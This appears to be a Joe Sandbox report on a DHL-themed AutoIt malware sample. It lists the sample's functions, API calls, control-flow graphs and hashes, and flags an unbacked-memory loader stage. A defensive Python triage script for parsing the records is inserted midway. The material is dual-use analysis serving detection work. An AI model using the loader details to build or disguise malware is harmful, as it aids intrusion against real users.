                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Similarity
                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                    • API String ID: 2914291525-1005189915

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 007B4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008752F8,?,007B37AE,?), ref: 007B4724
                                                                                      • Part of subcall function 007D050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007B7165), ref: 007D052D
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007B71A8
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007EE8C8
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007EE909
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 007EE947
                                                                                    • _wcscat.LIBCMT ref: 007EE9A0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Similarity
                                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                    • API String ID: 2673923337-2727554177

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 007B3A50
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 007B3A5F
                                                                                    • LoadIconW.USER32(00000063), ref: 007B3A76
                                                                                    • LoadIconW.USER32(000000A4), ref: 007B3A88
                                                                                    • LoadIconW.USER32(000000A2), ref: 007B3A9A
                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007B3AC0
                                                                                    • RegisterClassExW.USER32(?), ref: 007B3B16
                                                                                      • Part of subcall function 007B3041: GetSysColorBrush.USER32(0000000F), ref: 007B3074
                                                                                      • Part of subcall function 007B3041: RegisterClassExW.USER32(00000030), ref: 007B309E
                                                                                      • Part of subcall function 007B3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B30AF
                                                                                      • Part of subcall function 007B3041: InitCommonControlsEx.COMCTL32(?), ref: 007B30CC
                                                                                      • Part of subcall function 007B3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007B30DC
                                                                                      • Part of subcall function 007B3041: LoadIconW.USER32(000000A9), ref: 007B30F2
                                                                                      • Part of subcall function 007B3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007B3101
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                    • String ID: #$0$AutoIt v3
                                                                                    • API String ID: 423443420-4155596026
                                                                                    • Opcode ID: 4cc241ad445c80c104cab3fb4c67879c7de53fc43b3586902a69d653535f5587
                                                                                    • Instruction ID: 58538e288004c5dbee1ad721b71b9f22d9b7d20deba1771319a2bc94130a20e6
                                                                                    • Opcode Fuzzy Hash: 4cc241ad445c80c104cab3fb4c67879c7de53fc43b3586902a69d653535f5587
                                                                                    • Instruction Fuzzy Hash: 1A214871D20308AFEB10DFA4EC09B9D7BB5FB08711F14452AF608A62A6D7B596908F84

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 769 7b3633-7b3681 771 7b3683-7b3686 769->771 772 7b36e1-7b36e3 769->772 773 7b3688-7b368f 771->773 774 7b36e7 771->774 772->771 775 7b36e5 772->775 776 7b374b-7b3753 PostQuitMessage 773->776 777 7b3695-7b369a 773->777 779 7ed0cc-7ed0fa call 7c1070 call 7c1093 774->779 780 7b36ed-7b36f0 774->780 778 7b36ca-7b36d2 DefWindowProcW 775->778 786 7b3711-7b3713 776->786 784 7ed154-7ed168 call 812527 777->784 785 7b36a0-7b36a2 777->785 787 7b36d8-7b36de 778->787 815 7ed0ff-7ed106 779->815 781 7b36f2-7b36f3 780->781 782 7b3715-7b373c SetTimer RegisterWindowMessageW 780->782 788 7ed06f-7ed072 781->788 789 7b36f9-7b370c KillTimer call 7b443a call 7b3114 781->789 782->786 791 7b373e-7b3749 CreatePopupMenu 782->791 784->786 808 7ed16e 784->808 792 7b36a8-7b36ad 785->792 793 7b3755-7b375f call 7b44a0 785->793 786->787 801 7ed0a8-7ed0c7 MoveWindow 788->801 802 7ed074-7ed076 788->802 789->786 791->786 797 7ed139-7ed140 792->797 798 7b36b3-7b36b8 792->798 809 7b3764 793->809 797->778 804 7ed146-7ed14f call 807c36 797->804 806 7b36be-7b36c4 798->806 807 7ed124-7ed134 call 812d36 798->807 801->786 810 7ed078-7ed07b 802->810 811 7ed097-7ed0a3 SetFocus 802->811 804->778 806->778 806->815 807->786 808->778 809->786 810->806 816 7ed081-7ed092 call 7c1070 810->816 811->786 815->778 820 7ed10c-7ed11f call 7b443a call 7b434a 815->820 816->786 820->778
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 007B36D2
                                                                                    • KillTimer.USER32(?,00000001), ref: 007B36FC
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007B371F
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B372A
                                                                                    • CreatePopupMenu.USER32 ref: 007B373E
                                                                                    • PostQuitMessage.USER32(00000000), ref: 007B374D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                    • String ID: TaskbarCreated
                                                                                    • API String ID: 129472671-2362178303
                                                                                    • Opcode ID: 886542d78063872f2f92950b5d8176b22f9867b2336828ec9a9df45011274fc0
                                                                                    • Instruction ID: 29f5511fd211535ffacfbd1f1066467a27cf3e64eb4abe06e5482701264f3286
                                                                                    • Opcode Fuzzy Hash: 886542d78063872f2f92950b5d8176b22f9867b2336828ec9a9df45011274fc0
                                                                                    • Instruction Fuzzy Hash: B44123B2210949EBDB205F68DC8DBFA3754FB04300F540539F606D62A6DBBDDED492A2

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                    • API String ID: 1825951767-3513169116
                                                                                    • Opcode ID: 895b3cdeb53d235cb5a4ddcaac276c389c9ff89076823b8a781527c51cb191da
                                                                                    • Instruction ID: a26b05501beda8e775f96a83700eb8c2421f143aeedb95e3597e4cd833dca7a2
                                                                                    • Opcode Fuzzy Hash: 895b3cdeb53d235cb5a4ddcaac276c389c9ff89076823b8a781527c51cb191da
                                                                                    • Instruction Fuzzy Hash: A4A14B7191021DDADB04EBA4DC99BEEB778FF14300F44042AF515B7192EF78AA48CBA0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 944 149cc28-149ccd6 call 149a638 947 149ccdd-149cd03 call 149db38 CreateFileW 944->947 950 149cd0a-149cd1a 947->950 951 149cd05 947->951 958 149cd1c 950->958 959 149cd21-149cd3b VirtualAlloc 950->959 952 149ce55-149ce59 951->952 953 149ce9b-149ce9e 952->953 954 149ce5b-149ce5f 952->954 960 149cea1-149cea8 953->960 956 149ce6b-149ce6f 954->956 957 149ce61-149ce64 954->957 961 149ce7f-149ce83 956->961 962 149ce71-149ce7b 956->962 957->956 958->952 963 149cd3d 959->963 964 149cd42-149cd59 ReadFile 959->964 965 149ceaa-149ceb5 960->965 966 149cefd-149cf12 960->966 969 149ce93 961->969 970 149ce85-149ce8f 961->970 962->961 963->952 971 149cd5b 964->971 972 149cd60-149cda0 VirtualAlloc 964->972 973 149ceb9-149cec5 965->973 974 149ceb7 965->974 967 149cf22-149cf2a 966->967 968 149cf14-149cf1f VirtualFree 966->968 968->967 969->953 970->969 971->952 977 149cda2 972->977 978 149cda7-149cdc2 call 149dd88 972->978 975 149ced9-149cee5 973->975 976 149cec7-149ced7 973->976 974->966 980 149cef2-149cef8 975->980 981 149cee7-149cef0 975->981 979 149cefb 976->979 977->952 984 149cdcd-149cdd7 978->984 979->960 980->979 981->979 985 149cdd9-149ce08 call 149dd88 984->985 986 149ce0a-149ce1e call 149db98 984->986 985->984 992 149ce20 986->992 993 149ce22-149ce26 986->993 992->952 994 149ce28-149ce2c CloseHandle 993->994 995 149ce32-149ce36 993->995 994->995 996 149ce38-149ce43 VirtualFree 995->996 997 149ce46-149ce4f 995->997 996->997 997->947 997->952
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0149CCF9
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0149CF1F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053365471.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_149a000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileFreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 204039940-0
                                                                                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                    • Instruction ID: 419c186330cf35f55ae1eb63064333c95d255c3da061814820b5d3467fd2d453
                                                                                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                    • Instruction Fuzzy Hash: C0A11A74E00209EBDF14CFA4C894BEEBBB5BF48714F10815AE505BB291D7759A41CB94

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1075 7b39d5-7b3a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007B3A03
                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B3A24
                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 007B3A38
                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 007B3A41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateShow
                                                                                    • String ID: AutoIt v3$edit
                                                                                    • API String ID: 1584632944-3779509399
                                                                                    • Opcode ID: 8353997803258652df66131b49d164bc50d62dff465c950592a35e077e6b40ef
                                                                                    • Instruction ID: 13b8b7c18aa4cf8b099b543b65b7e5ec10a560b84aaabf94c749a7b247d9d7f0
                                                                                    • Opcode Fuzzy Hash: 8353997803258652df66131b49d164bc50d62dff465c950592a35e077e6b40ef
                                                                                    • Instruction Fuzzy Hash: 47F03A709102907EEB3057236C0DE2B3E7DF7C6F50F00002ABE08A2276C6A54880EAB0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1076 149c9e8-149cb1f call 149a638 call 149c8d8 CreateFileW 1083 149cb21 1076->1083 1084 149cb26-149cb36 1076->1084 1085 149cbd6-149cbdb 1083->1085 1087 149cb38 1084->1087 1088 149cb3d-149cb57 VirtualAlloc 1084->1088 1087->1085 1089 149cb59 1088->1089 1090 149cb5b-149cb72 ReadFile 1088->1090 1089->1085 1091 149cb74 1090->1091 1092 149cb76-149cbb0 call 149c918 call 149b8d8 1090->1092 1091->1085 1097 149cbcc-149cbd4 ExitProcess 1092->1097 1098 149cbb2-149cbc7 call 149c968 1092->1098 1097->1085 1098->1097
                                                                                    APIs
                                                                                      • Part of subcall function 0149C8D8: Sleep.KERNELBASE(000001F4), ref: 0149C8E9
                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0149CB15
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053365471.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_149a000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileSleep
                                                                                    • String ID: Z7E68YZKOM0XAT17Q02
                                                                                    • API String ID: 2694422964-3768408646
                                                                                    • Opcode ID: 37245a4e72cc826cb9209ba088b8d321523112dca6ccb009aa24ad77668258da
                                                                                    • Instruction ID: 3767ddf7d21696bd92e4320c2512a49fdeb07ece71375f1117fe302936572a07
                                                                                    • Opcode Fuzzy Hash: 37245a4e72cc826cb9209ba088b8d321523112dca6ccb009aa24ad77668258da
                                                                                    • Instruction Fuzzy Hash: A6519070D04249EBEF11DBE4D854BEEBBB9AF19300F00459AE608BB2C1D7790B45CBA5
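The two records above at 0149A000 are the ones a reviewer reads first: the sandbox reports their dump as "based on PE: false", i.e. the code was not mapped from the loaded image, and their edge lists name VirtualAlloc, ReadFile and ExitProcess that the shorter "APIs" lists leave out. The helper below is an added example, not Joe Sandbox's code and not part of this report. It parses the record layout used on this page (API call lines, the "Memory Dump Source" line and the serialized control_flow_graph edge list), separates image-backed from unbacked functions, merges the APIs visible in the edge list with the listed ones, and flags records carrying the AutoIt runtime markers that appear in this report ("AutoIt v3", ">>>AUTOIT SCRIPT<<<", ">>>AUTOIT NO CMDEXECUTE<<<", "/AutoIt3ExecuteScript"). The embedded input is constructed from two records on this page (the CreateWindowExW record at 007B39D5 and the abridged CreateFileW record at 0149C9E8); the heuristic that an edge-list token is an API name when it is an identifier but not a hex number is this example's assumption.

```python
"""Triage helper for the per-function records in this Joe Sandbox report
(added example, not Joe Sandbox's code and not part of the report)."""
import re
from dataclasses import dataclass, field

# Constructed input: lines copied (abridged) from two records in this report,
# one inside the image-backed AutoIt runtime and one in unbacked memory.
SAMPLE_REPORT = """\
Control-flow Graph
control_flow_graph 1075 7b39d5-7b3a45 CreateWindowExW * 2 ShowWindow * 2
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007B3A03
• ShowWindow.USER32(00000000,?,?), ref: 007B3A38
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• Instruction Fuzzy Hash: 47F03A709102907EEB3057236C0DE2B3E7DF7C6F50F00002ABE08A2276C6A54880EAB0
Control-flow Graph
control_flow_graph 1076 149c9e8-149cb1f call 149a638 call 149c8d8 CreateFileW 1083 149cb21 1076->1083 1088 149cb3d-149cb57 VirtualAlloc 1084->1088 1090 149cb5b-149cb72 ReadFile 1088->1090 1097 149cbcc-149cbd4 ExitProcess 1092->1097
APIs
  • Part of subcall function 0149C8D8: Sleep.KERNELBASE(000001F4), ref: 0149C8E9
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0149CB15
Memory Dump Source
• Source File: 00000000.00000002.2053365471.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
Similarity
• API ID: CreateFileSleep
• String ID: Z7E68YZKOM0XAT17Q02
• Instruction Fuzzy Hash: A6519070D04249EBEF11DBE4D854BEEBBB9AF19300F00459AE608BB2C1D7790B45CBA5
"""

# One API call line: optional "Part of subcall function X:" prefix, Name.Module,
# optional argument list, then the call-site address after "ref:".
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
SOURCE_LINE = re.compile(
    r"^•\s*Source File:\s*(?P<dump>[^,\s]+),\s*Offset:\s*(?P<base>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)$"
)
ID_LINE = re.compile(r"^•\s*(?P<key>API ID|String ID|Instruction Fuzzy Hash):\s*(?P<val>.*)$")
IDENT = re.compile(r"^[A-Za-z_]\w*$")
HEXNUM = re.compile(r"^[0-9A-Fa-f]+$")
# Runtime markers seen in the String IDs and call arguments of this report.
AUTOIT_MARKERS = ("AutoIt v3", ">>>AUTOIT SCRIPT<<<", ">>>AUTOIT NO CMDEXECUTE<<<", "/AutoIt3ExecuteScript")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)    # (api, module, args, ref, via_subcall)
    cfg_apis: set = field(default_factory=set)  # API names that only the edge list shows
    dump: str = ""
    base: int = 0
    image_backed: bool = True
    api_id: str = ""
    string_id: str = ""
    fuzzy_hash: str = ""

    @property
    def all_apis(self) -> set:
        """Listed APIs merged with those named only in the control-flow graph."""
        return {a[0] for a in self.apis} | self.cfg_apis


def parse_records(text: str) -> list:
    """Split report text into records; the Instruction Fuzzy Hash line closes one."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("control_flow_graph"):
            # Tokens are block ids, address ranges, "call", edges and API names;
            # assumption: an API name is an identifier that is not a hex number.
            for tok in line.split()[1:]:
                if IDENT.match(tok) and not HEXNUM.match(tok) and tok != "call":
                    cur.cfg_apis.add(tok)
        elif m := API_LINE.match(line):
            cur.apis.append((m["api"], m["mod"], m["args"] or "", int(m["ref"], 16), m["sub"] is not None))
        elif m := SOURCE_LINE.match(line):
            cur.dump, cur.base, cur.image_backed = m["dump"], int(m["base"], 16), m["pe"] == "true"
        elif m := ID_LINE.match(line):
            key, val = m["key"], m["val"].strip()
            if key == "API ID":
                cur.api_id = val
            elif key == "String ID":
                cur.string_id = val
            else:
                cur.fuzzy_hash = val
                records.append(cur)
                cur = FunctionRecord()
    return records


def unbacked_functions(records: list) -> list:
    """Functions dumped from memory the sandbox could not map to a PE image."""
    return [r for r in records if not r.image_backed]


def autoit_functions(records: list) -> list:
    """Functions whose strings or call arguments carry an AutoIt runtime marker."""
    hits = []
    for r in records:
        haystack = r.string_id + " " + " ".join(a[2] for a in r.apis)
        if any(marker in haystack for marker in AUTOIT_MARKERS):
            hits.append(r)
    return hits


if __name__ == "__main__":
    for r in unbacked_functions(parse_records(SAMPLE_REPORT)):
        print(f"{r.base:08X} unbacked; APIs {sorted(r.all_apis)}; strings {r.string_id}")
```

Run against the full report text rather than the embedded excerpt, the same functions give the list of every unbacked region and the union of APIs each one reaches, which is the starting point for carving the injected stage out of the 0149A000 dump.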

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1100 7b407c-7b4092 1101 7b4098-7b40ad call 7b7a16 1100->1101 1102 7b416f-7b4173 1100->1102 1105 7ed3c8-7ed3d7 LoadStringW 1101->1105 1106 7b40b3-7b40d3 call 7b7bcc 1101->1106 1109 7ed3e2-7ed3fa call 7b7b2e call 7b6fe3 1105->1109 1106->1109 1110 7b40d9-7b40dd 1106->1110 1119 7b40ed-7b416a call 7d2de0 call 7b454e call 7d2dbc Shell_NotifyIconW call 7b5904 1109->1119 1122 7ed400-7ed41e call 7b7cab call 7b6fe3 call 7b7cab 1109->1122 1112 7b40e3-7b40e8 call 7b7b2e 1110->1112 1113 7b4174-7b417d call 7b8047 1110->1113 1112->1119 1113->1119 1119->1102 1122->1119
                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007ED3D7
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                    • _memset.LIBCMT ref: 007B40FC
                                                                                    • _wcscpy.LIBCMT ref: 007B4150
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007B4160
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                    • String ID: Line:
                                                                                    • API String ID: 3942752672-1585850449
                                                                                    • Opcode ID: 43359506191fdfd9965277030cd5dd8030395980adb66101ebcd8348fbf4f773
                                                                                    • Instruction ID: 2835ce21ab6ca4023752d479502d26695712944e6c760ad947a50b3c64c83705
                                                                                    • Opcode Fuzzy Hash: 43359506191fdfd9965277030cd5dd8030395980adb66101ebcd8348fbf4f773
                                                                                    • Instruction Fuzzy Hash: 4F31A471408705EFD325EB60DC49FDB77E8BF54300F10491EF68992192DBB8A648CB96

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1135 7b686a-7b6891 call 7b4ddd 1138 7b6897-7b68a5 call 7b4ddd 1135->1138 1139 7ee031-7ee041 call 81955b 1135->1139 1138->1139 1144 7b68ab-7b68b1 1138->1144 1143 7ee046-7ee048 1139->1143 1145 7ee04a-7ee04d call 7b4e4a 1143->1145 1146 7ee067-7ee0af call 7d0db6 1143->1146 1148 7ee052-7ee061 call 8142f8 1144->1148 1149 7b68b7-7b68d9 call 7b6a8c 1144->1149 1145->1148 1154 7ee0d4 1146->1154 1155 7ee0b1-7ee0bb 1146->1155 1148->1146 1159 7ee0d6-7ee0e9 1154->1159 1158 7ee0cf-7ee0d0 1155->1158 1160 7ee0bd-7ee0cc 1158->1160 1161 7ee0d2 1158->1161 1162 7ee0ef 1159->1162 1163 7ee260-7ee263 call 7d2d55 1159->1163 1160->1158 1161->1159 1165 7ee0f6-7ee0f9 call 7b7480 1162->1165 1166 7ee268-7ee271 call 7b4e4a 1163->1166 1169 7ee0fe-7ee120 call 7b5db2 call 8173e9 1165->1169 1172 7ee273-7ee283 call 7b7616 call 7b5d9b 1166->1172 1178 7ee134-7ee13e call 8173d3 1169->1178 1179 7ee122-7ee12f 1169->1179 1188 7ee288-7ee2b8 call 80f7a1 call 7d0e2c call 7d2d55 call 7b4e4a 1172->1188 1186 7ee158-7ee162 call 8173bd 1178->1186 1187 7ee140-7ee153 1178->1187 1181 7ee227-7ee237 call 7b750f 1179->1181 1181->1169 1190 7ee23d-7ee247 call 7b735d 1181->1190 1198 7ee176-7ee180 call 7b5e2a 1186->1198 1199 7ee164-7ee171 1186->1199 1187->1181 1188->1172 1197 7ee24c-7ee25a 1190->1197 1197->1163 1197->1165 1198->1181 1205 7ee186-7ee19e call 80f73d 1198->1205 1199->1181 1210 7ee1a0-7ee1bf call 7b7de1 call 7b5904 1205->1210 1211 7ee1c1-7ee1c4 1205->1211 1234 7ee1e2-7ee1f0 call 7b5db2 1210->1234 1213 7ee1c6-7ee1e1 call 7b7de1 call 7b6839 call 7b5904 1211->1213 1214 7ee1f2-7ee1f5 1211->1214 1213->1234 1216 7ee1f7-7ee200 call 80f65e 1214->1216 1217 7ee215-7ee218 call 81737f 1214->1217 1216->1188 1227 7ee206-7ee210 call 7d0e2c 1216->1227 1224 7ee21d-7ee226 call 7d0e2c 1217->1224 1224->1181 1227->1169 1234->1224
                                                                                    APIs
                                                                                      • Part of subcall function 007B4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007B4E0F
                                                                                    • _free.LIBCMT ref: 007EE263
                                                                                    • _free.LIBCMT ref: 007EE2AA
                                                                                      • Part of subcall function 007B6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007B6BAD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
